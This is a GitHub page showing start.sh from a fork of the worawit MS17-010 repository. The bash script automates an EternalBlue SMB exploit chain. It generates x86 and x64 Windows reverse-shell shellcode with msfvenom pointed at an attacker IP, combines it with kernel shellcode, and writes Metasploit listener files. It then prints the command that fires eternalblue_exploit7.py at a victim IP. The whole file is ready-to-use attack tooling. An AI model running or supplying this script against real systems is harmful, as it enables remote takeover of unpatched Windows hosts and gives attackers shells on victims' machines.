forked from worawit/MS17-010
-
Notifications
You must be signed in to change notification settings - Fork 44
/
Copy pathstart.sh
executable file
·140 lines (108 loc) · 4.92 KB
/
start.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
#!/bin/bash
# change these values to your attacking IP and 2 ports for 32bit/64bit Architecture
attackerIP=192.168.2.133 # put your ip here*
vulnerableIP=192.168.2.253 # put the victim ip here*
arch_x86_port=4444 # x86 msfconsole multi handler port (optional change)
arch_x64_port=5555 # x64 msfconsole multi handler port (optional change)
# Some nice colours cause... who the hell likes a dull terminal
BLACK='\033[0;30m'
DARKGREY='\033[1;30m'
RED='\033[0;31m'
LIGHTRED='\033[1;31m'
GREEN='\033[0;32m'
LITEGREEN='\033[1;32m'
BROWNORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
LIGHTBLUE='\033[1;34m'
PURPLE='\033[0;35m'
LITEPURPLE='\033[1;35m'
CYAN='\033[0;36m'
LITECYAN='\033[1;36m'
LITEGREY='\033[0;37m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color
rm -rf $PWD/{output,bin}
mkdir -p $PWD/{output,bin}
# Metasploit console helper files.. cause who the hell likes typing this stuff
msfconsoleX64File=$PWD"/output/EternalBlueX64.rc"
msfconsoleX86File=$PWD"/output/EternalBlueX86.rc"
# binary files generated by metasploit
x86_msf_shellcode=$PWD"/bin/sc_x86_msf.bin"
x64_msf_shellcode=$PWD"/bin/sc_x64_msf.bin"
x86_shellcode=$PWD"/bin/sc_x86.bin"
x64_shellcode=$PWD"/bin/sc_x64.bin"
# all our shellcode successfully compiled
all_shellcode=$PWD"/bin/sc_all.bin"
mergeScript=$PWD"/merge_shellcode.py"
# base file name of Worawits raw Assembly.
rawAssembly_x64=$PWD"/assembly/eternalblue_kshellcode_x64"
rawAssembly_x86=$PWD"/assembly/eternalblue_kshellcode_x86"
# remove all dynamically generate files to start fresh!
rm $rawAssembly_x64 $rawAssembly_x86 2>/dev/null
printf "${LITEGREY}##############################################################\n"
printf "#################### MS17-010 SMB EXPLOIT ####################\n"
printf "####### Generating Shellcode for x64 + x86 EternalBlue #######\n"
printf "################ x86 exploit uses Port: $arch_x86_port #################\n"
printf "################ x64 exploit uses Port: $arch_x64_port #################\n"
printf "##############################################################${NC}\n\n\n"
printf "Step 1 of 7..\n"
printf "${RED}1. GENERATING MSF SHELLCODE x64${NC}"
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o $x64_msf_shellcode EXITFUNC=thread LHOST=$attackerIP LPORT=$arch_x64_port 2>/dev/null
printf "\n\n"
printf "Step 2 of 7..\n"
printf "${GREEN}2. GENERATING MSF SHELLCODE x86${NC}"
msfvenom -p windows/shell_reverse_tcp -f raw -o $x86_msf_shellcode EXITFUNC=thread LHOST=$attackerIP LPORT=$arch_x86_port 2>/dev/null
printf "\n\n"
printf "Step 3 of 7..\n"
printf "${PURPLE}3. GENERATING nasm SHELLCODE x64${NC}"
nasm -f bin $rawAssembly_x64.asm
printf "\n\n"
printf "Step 4 of 7..\n"
printf "${CYAN}4. GENERATING nasm SHELLCODE x86${NC}"
nasm -f bin $rawAssembly_x86.asm
printf "\n\n"
printf "Step 5 of 7..\n"
printf "${YELLOW}5. Combining nasm and MSF SHELLCODE to x86 binary${NC}"
cat $rawAssembly_x86 $x86_msf_shellcode > $x86_shellcode
printf "\n\n"
printf "Step 6 of 7..\n"
printf "${LITECYAN}6. Combining nasm and MSF SHELLCODE to x64 binary${NC}"
cat $rawAssembly_x64 $x64_msf_shellcode > $x64_shellcode
printf "\n\n"
printf "Step 7 of 7..\n"
printf "${BLUE}7. Finally Combining all of our binaries into 1 beast shellcode file for all architectures${NC}"
python $mergeScript $x86_shellcode $x64_shellcode $all_shellcode
printf "\n\n"
printf "${CYAN}Creating x86 MSF quick launch file..${NC}\n\n\r"
touch $msfconsoleX86File
echo "use exploit/multi/handler" >> $msfconsoleX86File
echo "set PAYLOAD windows/shell_reverse_tcp" >> $msfconsoleX86File
echo "set EXITFUNC thread" >> $msfconsoleX86File
echo "set ExitOnSession false" >> $msfconsoleX86File
echo "set LHOST $attackerIP" >> $msfconsoleX86File
echo "set LPORT $arch_x86_port" >> $msfconsoleX86File
echo "exploit -j" >> $msfconsoleX86File
printf "${CYAN}Creating x64 MSF quick launch file..${NC}\n\n\r"
touch $msfconsoleX64File
echo "use exploit/multi/handler" >> $msfconsoleX64File
echo "set PAYLOAD windows/x64/shell_reverse_tcp" >> $msfconsoleX64File
echo "set EXITFUNC thread" >> $msfconsoleX64File
echo "set ExitOnSession false" >> $msfconsoleX64File
echo "set LHOST $attackerIP" >> $msfconsoleX64File
echo "set LPORT $arch_x64_port" >> $msfconsoleX64File
echo "exploit -j" >> $msfconsoleX64File
printf "FINISHED!!!!...\n\n"
printf "${RED}Usage INSTRUCTIONS${NC}\n"
printf "Now you need to open 2 terminals and execute the following to active metasploit listeners..\n"
printf "for both x86 and x64 OS Architectures. If you already know the Systems Arch then you can just\n"
printf "use the following relevant metasploit run file we generated.\n"
printf "\n\n"
printf "${LITECYAN}For x64 bit Architecture: ${NC}"
printf "msfconsole -r \"${msfconsoleX64File}\""
printf "\n\n"
printf "${LITECYAN}For x86 bit Architecture: ${NC}"
printf "msfconsole -r \"${msfconsoleX86File}\""
printf "\n\n"
printf "${PURPLE} Now exploit using the Windows 7 script by running this: ${NC}\n\n\n"
printf "python $PWD/eternalblue_exploit7.py $vulnerableIP $all_shellcode 3\n\n"